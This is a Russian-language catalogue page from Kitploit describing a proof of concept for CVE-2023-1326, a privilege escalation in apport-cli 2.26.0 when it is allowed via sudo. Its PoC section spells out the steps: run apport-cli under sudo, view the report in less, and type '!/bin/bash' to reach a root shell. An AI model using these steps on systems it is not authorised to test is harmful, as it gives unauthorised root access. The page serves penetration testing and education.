Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-1326 — Это собственная и базовая proof-of-concept для уязвимости CVE-2023-1326 | Kitploit
Инструменты/GitHubGitHub/pol-ruiz/cve-2023-1326
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubpol-ruiz/cve-2023-1326

CVE-2023-1326

Это собственная и базовая proof-of-concept для уязвимости CVE-2023-1326

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-1326

Доказательство концепции для CVE-2023–1326 в apport-cli 2.26.0

Эта уязвимость — повышение привилегий в apport-cli 2.26.0, аналогично CVE-2023–26604, эта уязвимость работает только если apport-cli назначен в sudoers:

image

Атака повышения привилегий была обнаружена в apport-cli 2.26.0 и более ранних версиях, аналогичная CVE-2023-26604. Если система специально настроена так, чтобы позволить непривилегированным пользователям запускать sudo apport-cli, less настроен как пейджер, и можно установить размер терминала: локальный злоумышленник может повысить привилегии.

PoC

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash

image image

Скачать инструмент